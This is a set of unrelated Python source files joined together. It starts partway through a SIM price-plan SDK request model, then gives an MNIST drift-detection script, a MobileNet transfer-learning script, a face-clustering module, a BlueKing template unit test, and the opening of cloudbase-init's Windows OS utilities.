        Carrier: 101/1 China Mobile / China Mobile (physical SIM); 102/2 China Telecom / China Telecom (physical SIM); 3 China Unicom (physical SIM); 201 Europe; 501 Hong Kong (China); 502 Macao (China); 503 Thailand; 504 Japan; 505 Cambodia; 506 Indonesia; 507 Malaysia; 508 Singapore; 509 Sri Lanka; 510 Taiwan (China); 511 Bangladesh

        :return: The carrier_type of this ListProPricePlansRequest.
        :rtype: int
        """
        return self._carrier_type

    @carrier_type.setter
    def carrier_type(self, carrier_type):
        """Sets the carrier_type of this ListProPricePlansRequest.

        Carrier: 101/1 China Mobile / China Mobile (physical SIM); 102/2 China Telecom / China Telecom (physical SIM); 3 China Unicom (physical SIM); 201 Europe; 501 Hong Kong (China); 502 Macao (China); 503 Thailand; 504 Japan; 505 Cambodia; 506 Indonesia; 507 Malaysia; 508 Singapore; 509 Sri Lanka; 510 Taiwan (China); 511 Bangladesh

        :param carrier_type: The carrier_type of this ListProPricePlansRequest.
        :type: int
        """
        self._carrier_type = carrier_type

    @property
    def country_type(self):
        """Gets the country_type of this ListProPricePlansRequest.

        Country/region: 1 Hong Kong (China), 2 Macao (China), 3 Thailand, 4 Japan, 5 Cambodia, 6 Indonesia, 7 Malaysia, 8 Singapore, 9 Sri Lanka, 10 Taiwan (China), 11 Bangladesh

        :return: The country_type of this ListProPricePlansRequest.
        :rtype: int
        """
        return self._country_type

    @country_type.setter
    def country_type(self, country_type):
        """Sets the country_type of this ListProPricePlansRequest.

        Country/region: 1 Hong Kong (China), 2 Macao (China), 3 Thailand, 4 Japan, 5 Cambodia, 6 Indonesia, 7 Malaysia, 8 Singapore, 9 Sri Lanka, 10 Taiwan (China), 11 Bangladesh

        :param country_type: The country_type of this ListProPricePlansRequest.
        :type: int
        """
        self._country_type = country_type

    @property
    def sim_card_id(self):
        """Gets the sim_card_id of this ListProPricePlansRequest.

        SIM card identifier.

        :return: The sim_card_id of this ListProPricePlansRequest.
        :rtype: int
        """
        return self._sim_card_id

    @sim_card_id.setter
    def sim_card_id(self, sim_card_id):
        """Sets the sim_card_id of this ListProPricePlansRequest.

        SIM card identifier.

        :param sim_card_id: The sim_card_id of this ListProPricePlansRequest.
        :type: int
        """
        self._sim_card_id = sim_card_id

    @property
    def partner(self):
        """Gets the partner of this ListProPricePlansRequest.

        Partner.

        :return: The partner of this ListProPricePlansRequest.
        :rtype: int
        """
        return self._partner

    @partner.setter
    def partner(self, partner):
        """Sets the partner of this ListProPricePlansRequest.

        Partner.

        :param partner: The partner of this ListProPricePlansRequest.
        :type: int
        """
        self._partner = partner

    @property
    def package_type(self):
        """Gets the package_type of this ListProPricePlansRequest.

        Package (price plan) type.

        :return: The package_type of this ListProPricePlansRequest.
        :rtype: int
        """
        return self._package_type

    @package_type.setter
    def package_type(self, package_type):
        """Sets the package_type of this ListProPricePlansRequest.

        Package (price plan) type.

        :param package_type: The package_type of this ListProPricePlansRequest.
        :type: int
        """
        self._package_type = package_type

    @property
    def sim_type(self):
        """Gets the sim_type of this ListProPricePlansRequest.

        Applicable SIM card type.

        :return: The sim_type of this ListProPricePlansRequest.
        :rtype: int
        """
        return self._sim_type

    @sim_type.setter
    def sim_type(self, sim_type):
        """Sets the sim_type of this ListProPricePlansRequest.

        Applicable SIM card type.

        :param sim_type: The sim_type of this ListProPricePlansRequest.
        :type: int
        """
        self._sim_type = sim_type

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                # Mask sensitive attributes instead of exposing their values.
                if attr in self.sensitive_list:
                    result[attr] = "****"
                else:
                    result[attr] = value
        return result

    def to_str(self):
        """Returns the string representation of the model"""
        import simplejson as json
        # Python 2 compatibility shim for default encoding.
        if six.PY2:
            import sys
            reload(sys)
            sys.setdefaultencoding("utf-8")
        return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)

    def __repr__(self):
        """For `print`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, ListProPricePlansRequest):
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
|
# -*- coding: utf-8 -*-
import copy
import logging
from pathlib import Path
import click
import matplotlib.pyplot as plt
import torch
from sklearn.manifold import Isomap
from torchvision import datasets, transforms
import torchdrift
from src.models.classifier import Classifier
from torchdrift.detectors.mmd import (ExpKernel, GaussianKernel,
RationalQuadraticKernel)
@click.command()
@click.argument("data_filepath", type=click.Path(), default="data")
@click.argument(
    "trained_model_filepath", type=click.Path(), default="models/trained_model.pth"
)
def drift_detection(data_filepath, trained_model_filepath):
    """Implements drift detection with the MNIST project.

    Loads the MNIST training set, applies a Gaussian-blur corruption, fits
    three Kernel-MMD drift detectors (Gaussian, Exp, RationalQuadratic
    kernels) on clean features from a pretrained classifier, then scores
    both clean and corrupt batches and saves Isomap visualizations of the
    feature distributions as PDFs.

    :param data_filepath: folder (relative to project root) holding MNIST data.
    :param trained_model_filepath: path to the trained classifier state dict.
    """
    logger = logging.getLogger(__name__)
    logger.info("Drift detection with the MNIST data set")

    # Define a transform to normalize the data
    transform = transforms.Compose(
        [transforms.ToTensor(), transforms.Normalize((0.5,), (0.5,)),]
    )

    # Divide the training dataset into two parts:
    # a training set and a validation set
    project_dir = Path(__file__).resolve().parents[2]
    train_set = datasets.MNIST(
        project_dir.joinpath(data_filepath),
        download=False,
        train=True,
        transform=transform,
    )
    batch_size = 64
    train_loader = torch.utils.data.DataLoader(
        train_set, batch_size=batch_size, shuffle=True
    )

    # Plot example images
    N = 6
    # BUG FIX: Python 3 iterators have no .next() method —
    # `iter(train_loader).next()` raised AttributeError; use next(iter(...)).
    images, labels = next(iter(train_loader))
    images_corrupt = corruption_function(images)
    plt.figure(figsize=(15, 5))
    for i in range(N):
        # Plot the original MNIST image
        plt.subplot(2, N, i + 1)
        plt.title(labels[i].item())
        plt.imshow(images[i][0], cmap="gray")
        # plt.imshow(images[i].permute(1, 2, 0))
        plt.xticks([])
        plt.yticks([])

        # Plot the MNIST image with Gaussian blur
        plt.subplot(2, N, i + 1 + N)
        plt.title(labels[i].item())
        plt.imshow(images_corrupt[i][0], cmap="gray")
        # plt.imshow(images[i].permute(1, 2, 0))
        plt.xticks([])
        plt.yticks([])
    plt.show()

    # Load the trained model and expose its features instead of logits
    model = Classifier()
    project_dir = Path(__file__).resolve().parents[2]
    state_dict = torch.load(project_dir.joinpath(trained_model_filepath))
    model.load_state_dict(state_dict)
    model.return_features = True

    # From: https://torchdrift.org/notebooks/drift_detection_on_images.html
    # feature_extractor = copy.deepcopy(model)
    # feature_extractor.classifier = torch.nn.Identity()

    # The drift detector - Using the Kernel MMD drift detector on
    # the features extracted by the pretrained model
    gaussian_kernel = torchdrift.detectors.KernelMMDDriftDetector(
        kernel=GaussianKernel()
    )
    exp_kernel = torchdrift.detectors.KernelMMDDriftDetector(kernel=ExpKernel())
    rational_quadratic_kernel = torchdrift.detectors.KernelMMDDriftDetector(
        kernel=RationalQuadraticKernel()
    )
    kernel_names = ["GaussianKernel", "ExpKernel", "RationalQuadraticKernel"]
    scores_real, p_vals_real, scores_corrupt, p_vals_corrupt = [], [], [], []
    for i, kernel in enumerate(
        [gaussian_kernel, exp_kernel, rational_quadratic_kernel]
    ):
        print(i)
        kernel_name = kernel_names[i]
        drift_detector = kernel

        # Fit the drift detector using training data
        torchdrift.utils.fit(train_loader, model, drift_detector, num_batches=20)

        # Test the output on actual training inputs
        features = model(images)
        score = drift_detector(features)
        p_val = drift_detector.compute_p_value(features)
        scores_real.append(score)
        p_vals_real.append(p_val)
        print(p_val)

        # Visualize the two distributions to determine if they look close
        mapper = Isomap(n_components=2)
        base_embedded = mapper.fit_transform(drift_detector.base_outputs)
        features_embedded = mapper.transform(features.detach().numpy())
        f = plt.figure(figsize=(12, 8))
        plt.scatter(base_embedded[:, 0], base_embedded[:, 1], s=2, c="r")
        plt.scatter(features_embedded[:, 0], features_embedded[:, 1], s=4)
        plt.title(f"{kernel_name} real data, score {score:.2f} p-value {p_val:.2f}")
        # plt.show()
        f.savefig(kernel_name + "_Distributions_Real_Data.pdf", bbox_inches="tight")

        # Test the output on actual corrupt training inputs
        features = model(images_corrupt)
        score = drift_detector(features)
        p_val = drift_detector.compute_p_value(features)
        scores_corrupt.append(score)
        p_vals_corrupt.append(p_val)

        # Visualize the two distributions to determine if they look close
        features_embedded = mapper.transform(features.detach().numpy())
        f = plt.figure(figsize=(12, 8))
        plt.scatter(base_embedded[:, 0], base_embedded[:, 1], s=2, c="r")
        plt.scatter(features_embedded[:, 0], features_embedded[:, 1], s=4)
        plt.title(f"{kernel_name} corrupt data, score {score:.2f} p-value {p_val:.2f}")
        # plt.show()
        f.savefig(kernel_name + "_Distributions_Corrupt_Data.pdf", bbox_inches="tight")

    print(scores_real)
    print(p_vals_real)
    print(scores_corrupt)
    print(p_vals_corrupt)
def corruption_function(x: torch.Tensor) -> torch.Tensor:
    """Applies a Gaussian blur (severity 5) to x, simulating data drift."""
    return torchdrift.data.functional.gaussian_blur(x, severity=5)
if __name__ == "__main__":
    # Configure root logging before invoking the click CLI entry point.
    log_fmt = "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
    logging.basicConfig(level=logging.INFO, format=log_fmt)
    drift_detection()
|
import pandas as pd
import numpy as np
import os, sys
import keras
import matplotlib.pyplot as plt
from keras.applications import MobileNet
from keras.preprocessing import image
from keras.applications.mobilenet import preprocess_input
from keras.models import Model
from keras.optimizers import Adam
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.layers import Conv2D, MaxPooling2D
from keras.layers import Activation, Dropout, Flatten, Dense, GlobalAveragePooling2D
from keras import backend as K
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
# Transfer-learning script: fine-tunes a MobileNet on a binary
# hotdog/not-hotdog dataset and saves the resulting model.
#----------------------Parameters----------------------------------------
#dimensions of our images.
img_width, img_height = 224,224 #This matches the MobileNet input size
train_data_dir = '../hotdogs_data/train'
validation_data_dir = '../hotdogs_data/validation'
nb_train_samples = 800 #this divided by the batch size will give the number of steps per epoch
nb_validation_samples = 100
epochs = 50
batch_size = 16 #how many images to include before taking a gradient step
# Keras backends differ on channel ordering; build the input shape accordingly.
# NOTE(review): input_shape is computed but never used below — MobileNet is
# built without an explicit input shape.
if K.image_data_format() == 'channels_first':
    input_shape = (3, img_width, img_height)
else:
    input_shape = (img_width, img_height, 3)
# STEP 1 Build the Model-----------------------------------------------------------------------------------------------------------------
base_model=MobileNet(weights='imagenet',include_top=False) #imports the mobilenet model and discards the last 1000 neuron layer.
x=base_model.output
x=GlobalAveragePooling2D()(x)
x=Dense(1024,activation='relu')(x) #we add dense layers so that the model can learn more
x=Dropout(0.75)(x)
x=Dense(64,activation='relu')(x)
x=Dropout(0.5)(x)
preds=Dense(1, activation='sigmoid')(x)
#preds=Dense(2,activation='softmax')(x) #final layer with softmax activation
model=Model(inputs=base_model.input,outputs=preds)
#Check model
for i,layer in enumerate(model.layers):
    print(i,layer.name)
#Set the allowed trainable models
# NOTE(review): this blanket freeze is immediately overridden by the two
# loops below; it is redundant (but harmless).
for layer in model.layers:
    layer.trainable=False
# or if we want to set the first X layers of the network to be non-trainable
for layer in model.layers[:80]:
    layer.trainable=False
for layer in model.layers[80:]:
    layer.trainable=True
#-----------STEP 2 LOAD the training data-------------------------------------
test_datagen = ImageDataGenerator(preprocessing_function=preprocess_input)
# this is the augmentation configuration we will use for training
train_datagen = ImageDataGenerator(
    preprocessing_function=preprocess_input,
    rotation_range=40,
    width_shift_range=0.2,
    height_shift_range=0.2,
    shear_range=0.2,
    zoom_range=0.2,
    horizontal_flip=True,
    fill_mode='nearest'
)
train_generator = train_datagen.flow_from_directory(
    train_data_dir,
    target_size=(img_width, img_height),
    batch_size=batch_size,
    class_mode='binary')
validation_generator = test_datagen.flow_from_directory(
    validation_data_dir,
    target_size=(img_width, img_height),
    batch_size=batch_size,
    class_mode='binary')
model.compile(loss='binary_crossentropy',
              optimizer='adam',
              metrics=['accuracy'])
# NOTE(review): Keras class weights are conventionally keyed by int class
# index ({0: 1.0, 1: 1.0}); equal weights make this a no-op in any case.
class_weight={0.0: 1.0, 1.0:1.0}
# NOTE(review): fit_generator is deprecated in modern Keras in favour of
# model.fit(...), which accepts generators directly.
model.fit_generator(
    train_generator,
    steps_per_epoch=nb_train_samples // batch_size,
    epochs=epochs,
    validation_data=validation_generator,
    validation_steps=nb_validation_samples // batch_size,
    class_weight=class_weight)
model.save('transfer_learning_mobile_net.h5')
#os.system("tensorflowjs_converter --input_format keras transfer_learning_mobile_net.h5 ../model/")
|
<reponame>anhlbt/faceidsys
import dlib_api
from image_utils import brightness, get_onedir, clahe_image, printProgressBar
from enum import Enum
from PIL import Image
import numpy as np
from os.path import join, basename, exists, dirname, realpath
from os import makedirs
import numpy as np
import shutil
import sys, os
import cv2
# Absolute directory of this module and its parent (the project root).
CURRENT_DIR = dirname(realpath(__file__))
PARRENT_DIR = dirname(CURRENT_DIR)  # NOTE: "PARRENT" spelling kept — referenced below
class ClusteringModels(Enum):
    """Identifiers for the supported clustering algorithms."""
    CHINESE_WHISPER = 0
    K_MEANS = 1
    # Alias: DEFAULT is the same member (not a new value) as CHINESE_WHISPER.
    DEFAULT = CHINESE_WHISPER
class Clustering_ChineseWhispers():
    """Face clustering backend based on the Chinese Whispers graph algorithm."""

    def _chinese_whispers(self, encoding_list, threshold=0.38, iterations=1000):
        """ Chinese Whispers
        Inputs:
            :param encoding_list: iterable of (image_path, facial_encoding) pairs
            :param threshold: facial match threshold (max distance for an edge)
            :param iterations: since chinese whispers is an iterative algorithm,
                number of times to iterate
        Outputs:
            :return sorted_clusters: a list of clusters, a cluster being a list
                of image paths, sorted by largest cluster to smallest
        """
        import networkx as nx
        # Materialize so we can check the length and unpack (a dict_items
        # view cannot be consumed twice). Bug fix: the old code called
        # zip(*encoding_list) first, which raises on an empty input.
        encoding_list = list(encoding_list)
        if len(encoding_list) <= 1:
            print("No enough encodings to cluster!")
            return []
        image_paths, encodings = zip(*encoding_list)
        nodes = []
        edges = []
        for idx, face_encoding_to_check in enumerate(encodings):
            node_id = idx + 1
            # Each node starts as its own cluster, labelled by its image path.
            nodes.append((node_id,
                          {'cluster': image_paths[idx], 'path': image_paths[idx]}))
            if (idx + 1) >= len(encodings):
                break  # last node: nothing left to compare against
            distances = dlib_api.face_distance(encodings[idx + 1:],
                                               face_encoding_to_check)
            for i, distance in enumerate(distances):
                if distance <= threshold:
                    # Edge between matching faces, weighted by distance.
                    edges.append((node_id, idx + i + 2, {'weight': distance}))
        G = nx.Graph()
        G.add_nodes_from(nodes)
        G.add_edges_from(edges)
        # Iteratively relabel each node with the dominant cluster label among
        # its neighbors (weighted by edge weight).
        # Bug fix: G.node[...] was removed in networkx >= 2.4; use G.nodes[...].
        for _ in range(iterations):
            for node in list(G.nodes()):
                clusters = {}
                for ne in G[node]:
                    if isinstance(ne, int):
                        label = G.nodes[ne]['cluster']
                        clusters[label] = (clusters.get(label, 0)
                                           + G[node][ne]['weight'])
                # Pick the label with the highest edge-weight sum.
                edge_weight_sum = 0
                max_cluster = G.nodes[node]['cluster']
                for cluster, weight in clusters.items():
                    if weight > edge_weight_sum:
                        edge_weight_sum = weight
                        max_cluster = cluster
                G.nodes[node]['cluster'] = max_cluster
        # Group image paths by their final cluster label.
        clusters = {}
        for _, data in G.nodes(data=True):
            cluster = data['cluster']
            if cluster:
                clusters.setdefault(cluster, []).append(data['path'])
        # Largest cluster first.
        return sorted(clusters.values(), key=len, reverse=True)

    def fit(self, facial_encodings, output_dir):
        """Cluster the given encodings and copy each image into a numbered
        per-cluster subfolder of output_dir.
        """
        sorted_clusters = self._chinese_whispers(facial_encodings.items())
        for idx, cluster in enumerate(sorted_clusters):
            cluster_dir = join(output_dir, str(idx))
            if not exists(cluster_dir):
                makedirs(cluster_dir)
            for path in cluster:
                shutil.copy(path, join(cluster_dir, basename(path)))
class Clustering():
    """Computes facial encodings for a folder of face crops and clusters them."""

    def __init__(self, image_folder, out_path, cluster_alg=ClusteringModels.DEFAULT):
        """
        :param image_folder: folder containing pre-cropped face images
        :param out_path: output folder for per-cluster subdirectories
        :param cluster_alg: ClusteringModels member selecting the backend
        """
        # Bug fix: the original referenced an undefined name 'output_dir'
        # here (NameError on first run when the folder was missing).
        if not exists(out_path):
            makedirs(out_path)
        self._clustering = None
        self.out_path = out_path
        self.facial_encodings = self.compute_facial_encodings(
            get_onedir(image_folder))
        # Bug fix: the original referenced bare 'facial_encodings'
        # (NameError) instead of the attribute just assigned above.
        if len(self.facial_encodings) <= 1:
            print("Number of facial encodings must be greater than one, can't cluster")
            return
        if cluster_alg == ClusteringModels.CHINESE_WHISPER:
            self._clustering = Clustering_ChineseWhispers()
        elif cluster_alg == ClusteringModels.K_MEANS:
            self._clustering = None  # K-means backend not implemented yet

    def fit(self):
        """Run the selected clustering backend over the computed encodings."""
        self._clustering.fit(self.facial_encodings, self.out_path)

    def compute_facial_encodings(self, paths):
        """
        Inputs:
            :param paths: a list of image paths
        Outputs:
            :return facial_encodings: {image_path: facial_encoding} dictionary
        """
        facial_encodings = {}
        total = len(paths)
        # Initial call to print 0% progress
        printProgressBar(0, total, prefix='Progress:', suffix='Complete', length=50)
        for x in range(total):
            printProgressBar(x, total, prefix='Progress:', suffix='Complete', length=50)
            try:
                item = paths[x]
                # str.endswith accepts a tuple of suffixes.
                if not item.endswith(('jpg', 'jpeg', 'png', 'JPG', 'bmp')):
                    continue
                frame = cv2.imread(item)
                height = frame.shape[0]
                width = frame.shape[1]
                # Faces were already cropped (with margin) upstream, so use the
                # whole frame minus a 10px border as the face location.
                # (top, right, bottom, left)
                face_loc = [(10, width - 10, height - 10, 10)]
                face_encoding = dlib_api.face_encodings(frame, face_loc)
                # Perf fix: removed an unused second full-frame
                # dlib_api.face_encodings() call whose result was discarded.
                if len(face_encoding) == 0:
                    print("no face detected on this one", item)
                else:
                    facial_encodings[item] = face_encoding[0]
            except Exception as ex:
                # Best-effort: a single unreadable image should not abort the run.
                print(ex)
        return facial_encodings
if __name__=="__main__":
    print("#"*50)
    # _cluster = Clustering(image_folder = join(PARRENT_DIR, "data/5people_clustering"),\
    # out_path=join(PARRENT_DIR, "data/clustering_out"))
    # NOTE(review): machine-specific hard-coded input folder — adjust before
    # running anywhere else.
    image_folder = "/home/500/anh_lbt/IMAGE_TASK/Photos_out"
    out_path=join(PARRENT_DIR, "data/clustering_out")
    if not os.path.exists(out_path):
        os.makedirs(out_path)
    # Cluster all face crops from image_folder into per-cluster subfolders
    # under out_path.
    _cluster = Clustering(image_folder, out_path)
    _cluster.fit()
<filename>gcloud/tests/template_base/models/base_template_manager/test_check_templates_subprocess_expired.py<gh_stars>100-1000
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from mock import patch, MagicMock
from django.test import TestCase
from gcloud.tests.mock_settings import * # noqa
from gcloud.template_base.models import BaseTemplateManager
class CheckTemplatesSubprocessExpiredTestCase(TestCase):
    """Tests for BaseTemplateManager.check_templates_subprocess_expired."""

    def test_normal(self):
        # Build relationship mocks from a data table:
        # (ancestor, descendant, subprocess node, version, always_use_latest)
        relationship_specs = [
            ("a1", "d1", "n1", "v1", True),
            ("a1", "d2", "n2", "v2", False),
            ("a2", "d3", "n3", "v3", False),
            ("a2", "d4", "n4", "v4", True),
            ("a3", "d5", "n5", "v5", False),
        ]
        relationships = []
        for ancestor, descendant, node, version, use_latest in relationship_specs:
            rel = MagicMock()
            rel.ancestor_template_id = ancestor
            rel.descendant_template_id = descendant
            rel.subprocess_node_id = node
            rel.version = version
            rel.always_use_latest = use_latest
            relationships.append(rel)
        # Current-version mocks: (template_id, current_version). Templates
        # whose current version moved past the referenced one are expired,
        # unless the relationship always uses the latest version.
        version_specs = [
            ("d1", "v1_new"),
            ("d2", "v2"),
            ("d3", "v3_new"),
            ("d4", "v4_new"),
            ("d5", "v5"),
        ]
        versions = []
        for template_id, current_version in version_specs:
            ver = MagicMock()
            ver.template_id = template_id
            ver.current_version = current_version
            versions.append(ver)
        TemplateRelationship = MagicMock()
        TemplateRelationship.objects.filter = MagicMock(return_value=relationships)
        TemplateCurrentVersion = MagicMock()
        TemplateCurrentVersion.objects.filter = MagicMock(return_value=versions)
        with patch(TEMPLATE_BASE_MODELS_TEMPLATE_RELATIONSHIP, TemplateRelationship):
            with patch(TEMPLATE_BASE_MODELS_TEMPLATE_CURRENT_VERSION, TemplateCurrentVersion):
                expired_template_id = BaseTemplateManager().check_templates_subprocess_expired(
                    [
                        {"id": "t1", "pipeline_template_id": "a1"},
                        {"id": "t1", "pipeline_template_id": "a1"},
                        {"id": "t2", "pipeline_template_id": "a2"},
                        {"id": "t2", "pipeline_template_id": "a2"},
                        {"id": "t3", "pipeline_template_id": "a3"},
                    ]
                )
        # Only t2 references a subprocess (d3) that is both outdated and not
        # pinned to "always use latest".
        self.assertEqual(expired_template_id, ["t2"])
|
<reponame>andia10240/cloudbase-init
# Copyright 2012 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import ctypes
from ctypes import wintypes
import os
import re
import struct
import subprocess
import time
import netaddr
from oslo_log import log as oslo_logging
import pywintypes
import six
from six.moves import winreg
from tzlocal import windows_tz
import win32api
from win32com import client
import win32net
import win32netcon
import win32process
import win32security
import win32service
import winerror
from cloudbaseinit import constant
from cloudbaseinit import exception
from cloudbaseinit.osutils import base
from cloudbaseinit.utils import classloader
from cloudbaseinit.utils import retry_decorator
from cloudbaseinit.utils.windows import disk
from cloudbaseinit.utils.windows import network
from cloudbaseinit.utils.windows import privilege
from cloudbaseinit.utils.windows import timezone
from cloudbaseinit.utils.windows import wmi_loader
# Module-level WMI connection factory and logger.
wmi = wmi_loader.wmi()
LOG = oslo_logging.getLogger(__name__)
# Winsock address families and IP address configuration constants.
AF_INET = 2
AF_INET6 = 23
UNICAST = 1
MANUAL = 1
PREFERRED_ADDR = 4
# ctypes handles to the native Windows DLLs used throughout this module.
advapi32 = ctypes.windll.advapi32
kernel32 = ctypes.windll.kernel32
netapi32 = ctypes.windll.netapi32
userenv = ctypes.windll.userenv
iphlpapi = ctypes.windll.iphlpapi
Ws2_32 = ctypes.windll.Ws2_32
setupapi = ctypes.windll.setupapi
msvcrt = ctypes.cdll.msvcrt
ntdll = ctypes.windll.ntdll
secur32 = ctypes.windll.secur32
# ctypes mirrors of the Win32 structures used by the API calls below.
# Field names and order must match the native layouts exactly.
class Win32_PROFILEINFO(ctypes.Structure):
    # Mirrors PROFILEINFO (userenv.h), used by LoadUserProfileW.
    _fields_ = [
        ('dwSize', wintypes.DWORD),
        ('dwFlags', wintypes.DWORD),
        ('lpUserName', wintypes.LPWSTR),
        ('lpProfilePath', wintypes.LPWSTR),
        ('lpDefaultPath', wintypes.LPWSTR),
        ('lpServerName', wintypes.LPWSTR),
        ('lpPolicyPath', wintypes.LPWSTR),
        ('hprofile', wintypes.HANDLE)
    ]
class Win32_LOCALGROUP_MEMBERS_INFO_3(ctypes.Structure):
    # Mirrors LOCALGROUP_MEMBERS_INFO_3, used by NetLocalGroupAddMembers.
    _fields_ = [
        ('lgrmi3_domainandname', wintypes.LPWSTR)
    ]
class Win32_MIB_IPFORWARDROW(ctypes.Structure):
    # Mirrors MIB_IPFORWARDROW: one entry of the IPv4 routing table.
    _fields_ = [
        ('dwForwardDest', wintypes.DWORD),
        ('dwForwardMask', wintypes.DWORD),
        ('dwForwardPolicy', wintypes.DWORD),
        ('dwForwardNextHop', wintypes.DWORD),
        ('dwForwardIfIndex', wintypes.DWORD),
        ('dwForwardType', wintypes.DWORD),
        ('dwForwardProto', wintypes.DWORD),
        ('dwForwardAge', wintypes.DWORD),
        ('dwForwardNextHopAS', wintypes.DWORD),
        ('dwForwardMetric1', wintypes.DWORD),
        ('dwForwardMetric2', wintypes.DWORD),
        ('dwForwardMetric3', wintypes.DWORD),
        ('dwForwardMetric4', wintypes.DWORD),
        ('dwForwardMetric5', wintypes.DWORD)
    ]
class Win32_MIB_IPFORWARDTABLE(ctypes.Structure):
    # Mirrors MIB_IPFORWARDTABLE. 'table' is declared with one element;
    # the real (variable-length) array is accessed via the returned buffer.
    _fields_ = [
        ('dwNumEntries', wintypes.DWORD),
        ('table', Win32_MIB_IPFORWARDROW * 1)
    ]
class Win32_OSVERSIONINFOEX_W(ctypes.Structure):
    # Mirrors OSVERSIONINFOEXW, used by RtlGetVersion/RtlVerifyVersionInfo.
    _fields_ = [
        ('dwOSVersionInfoSize', wintypes.DWORD),
        ('dwMajorVersion', wintypes.DWORD),
        ('dwMinorVersion', wintypes.DWORD),
        ('dwBuildNumber', wintypes.DWORD),
        ('dwPlatformId', wintypes.DWORD),
        ('szCSDVersion', wintypes.WCHAR * 128),
        ('wServicePackMajor', wintypes.WORD),
        ('wServicePackMinor', wintypes.WORD),
        ('wSuiteMask', wintypes.WORD),
        ('wProductType', wintypes.BYTE),
        ('wReserved', wintypes.BYTE)
    ]
class Win32_SP_DEVICE_INTERFACE_DATA(ctypes.Structure):
    # Mirrors SP_DEVICE_INTERFACE_DATA (setupapi.h).
    _fields_ = [
        ('cbSize', wintypes.DWORD),
        ('InterfaceClassGuid', disk.GUID),
        ('Flags', wintypes.DWORD),
        ('Reserved', ctypes.POINTER(wintypes.ULONG))
    ]
class Win32_SP_DEVICE_INTERFACE_DETAIL_DATA_W(ctypes.Structure):
    # Mirrors SP_DEVICE_INTERFACE_DETAIL_DATA_W; DevicePath is a
    # variable-length string read out of the trailing buffer.
    _fields_ = [
        ('cbSize', wintypes.DWORD),
        ('DevicePath', ctypes.c_byte * 2)
    ]
class Win32_STORAGE_DEVICE_NUMBER(ctypes.Structure):
    # Mirrors STORAGE_DEVICE_NUMBER (IOCTL_STORAGE_GET_DEVICE_NUMBER output).
    _fields_ = [
        ('DeviceType', wintypes.DWORD),
        ('DeviceNumber', wintypes.DWORD),
        ('PartitionNumber', wintypes.DWORD)
    ]
class Win32_STARTUPINFO_W(ctypes.Structure):
    # Mirrors STARTUPINFOW, used by CreateProcessAsUserW.
    _fields_ = [
        ('cb', wintypes.DWORD),
        ('lpReserved', wintypes.LPWSTR),
        ('lpDesktop', wintypes.LPWSTR),
        ('lpTitle', wintypes.LPWSTR),
        ('dwX', wintypes.DWORD),
        ('dwY', wintypes.DWORD),
        ('dwXSize', wintypes.DWORD),
        ('dwYSize', wintypes.DWORD),
        ('dwXCountChars', wintypes.DWORD),
        ('dwYCountChars', wintypes.DWORD),
        ('dwFillAttribute', wintypes.DWORD),
        ('dwFlags', wintypes.DWORD),
        ('wShowWindow', wintypes.WORD),
        ('cbReserved2', wintypes.WORD),
        ('lpReserved2', ctypes.POINTER(wintypes.BYTE)),
        ('hStdInput', wintypes.HANDLE),
        ('hStdOutput', wintypes.HANDLE),
        ('hStdError', wintypes.HANDLE),
    ]
class Win32_PROCESS_INFORMATION(ctypes.Structure):
    # Mirrors PROCESS_INFORMATION (CreateProcessAsUserW output).
    _fields_ = [
        ('hProcess', wintypes.HANDLE),
        ('hThread', wintypes.HANDLE),
        ('dwProcessId', wintypes.DWORD),
        ('dwThreadId', wintypes.DWORD),
    ]
# Declare argtypes/restype for every native call so ctypes marshals
# arguments correctly (critical on 64-bit, where the defaults truncate
# pointers and handles).
advapi32.CreateProcessAsUserW.argtypes = [wintypes.HANDLE,
                                          wintypes.LPCWSTR,
                                          wintypes.LPWSTR,
                                          ctypes.c_void_p,
                                          ctypes.c_void_p,
                                          wintypes.BOOL,
                                          wintypes.DWORD,
                                          ctypes.c_void_p,
                                          wintypes.LPCWSTR,
                                          ctypes.POINTER(
                                              Win32_STARTUPINFO_W),
                                          ctypes.POINTER(
                                              Win32_PROCESS_INFORMATION)]
advapi32.CreateProcessAsUserW.restype = wintypes.BOOL
# C runtime heap helpers.
msvcrt.malloc.argtypes = [ctypes.c_size_t]
msvcrt.malloc.restype = ctypes.c_void_p
msvcrt.free.argtypes = [ctypes.c_void_p]
msvcrt.free.restype = None
# OS version queries (RtlGetVersion is unaffected by compatibility shims).
ntdll.RtlGetVersion.argtypes = [
    ctypes.POINTER(Win32_OSVERSIONINFOEX_W)]
ntdll.RtlGetVersion.restype = wintypes.DWORD
ntdll.RtlVerifyVersionInfo.argtypes = [
    ctypes.POINTER(Win32_OSVERSIONINFOEX_W),
    wintypes.DWORD, wintypes.ULARGE_INTEGER]
